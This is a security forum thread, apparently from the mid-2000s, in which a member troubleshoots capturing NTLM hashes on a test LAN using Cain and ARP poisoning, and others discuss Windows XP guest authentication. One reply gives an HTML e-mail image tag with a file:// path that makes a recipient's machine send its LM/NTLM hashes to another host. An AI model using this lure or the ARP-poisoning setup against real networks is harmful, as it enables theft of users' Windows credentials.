Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: Sniffing NTLM

  1. #1
    Junior Member
    Join Date
    Apr 2004
    Posts
    20

    Sniffing NTLM

    I was wondering about what might be wrong here:
    I was trying to get the NTLM hashes from another test computer in my switched LAN.
    Started Cain ( www.oxid.it ) Enabled ARP poison routing, got to the other computer to log on to the computer running Cain. Then checked Cain, yes it sniffed SMB-actions. Imported the hashes to the cracker, but all the passwords where "empty". Noticed that these logons where logged on as Guest. Darn.. So I changed the Guest account password. And tried again. This time the logon attempts where Failed. And I got new hashes, but again the pass. where "empty".
    The reason why I tried the above was that I have been told that windows will try the logged in user as an final attempt to access network shares on another computer..

    Anyone who figures out what went wrong in my attempt?

  2. #2
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    It's the client that's sending the "empty" password.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  3. #3
    Junior Member
    Join Date
    Apr 2004
    Posts
    20
    Yes.. That's right, but is there any way I can force the client computer to send his password hashes? I have seen some options in sniffer programs where it is possible to "force cleartext password" ++. Is this what makes me get his password hashes?

  4. #4
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    What's the client's OS? What's the server's OS?
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  5. #5
    Junior Member
    Join Date
    Apr 2004
    Posts
    20
    Both are using Microsoft Windows Xp Home Edition.

  6. #6
    Junior Member
    Join Date
    Nov 2001
    Posts
    26
    By default Windows XP authenticates a network user as guest. This can be the issue here. On Windows XP Pro you can change this from the Group Policy -
    Computer Config > Windows settings > Security settings > Local policies > Security Options > Network access:Sharing and security model for local accounts
    Not sure of this option on Home edition. Hope this helps.
    -Joseph

  7. #7
    Member
    Join Date
    Aug 2004
    Posts
    95
    Your computer will send NTLM password for authenitication if you have an DHCP server in the network, otherwise as some one told it will be using your guest account for shares.

    For me with DHCP it works fine.

  8. #8
    Junior Member
    Join Date
    Nov 2001
    Posts
    26
    I've not seen any relation between network authentication and DHCP. Networks with static IP address also work with NTLM authentication.

  9. #9
    Junior Member
    Join Date
    Nov 2003
    Posts
    4
    To get a machine to send its LM and NTLM hashes send an html e-mail with the following in the document:

    <img src=file://nbmachinename/null/gif height=1 width=1>

    that will cause the client to send hashes for the current user (works on my network anywayz)

  10. #10
    Senior Member
    Join Date
    Jun 2004
    Posts
    460
    wasn't this one of the vunerabilities that was patched with the jpeg patch??
    [gloworange]find / -name \"*your_base*\" -exec chown us:us {} \\;[/gloworange] [glowpurple]Trust No One[/glowpurple][shadow] Use Hardened Gentoo [/shadow]
    CATAPULTAM HABEO. NISI PECUNIAM OMNEM MIHI DABIS, AD CAPUT TUUM SAXUM IMMANE MITTAM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •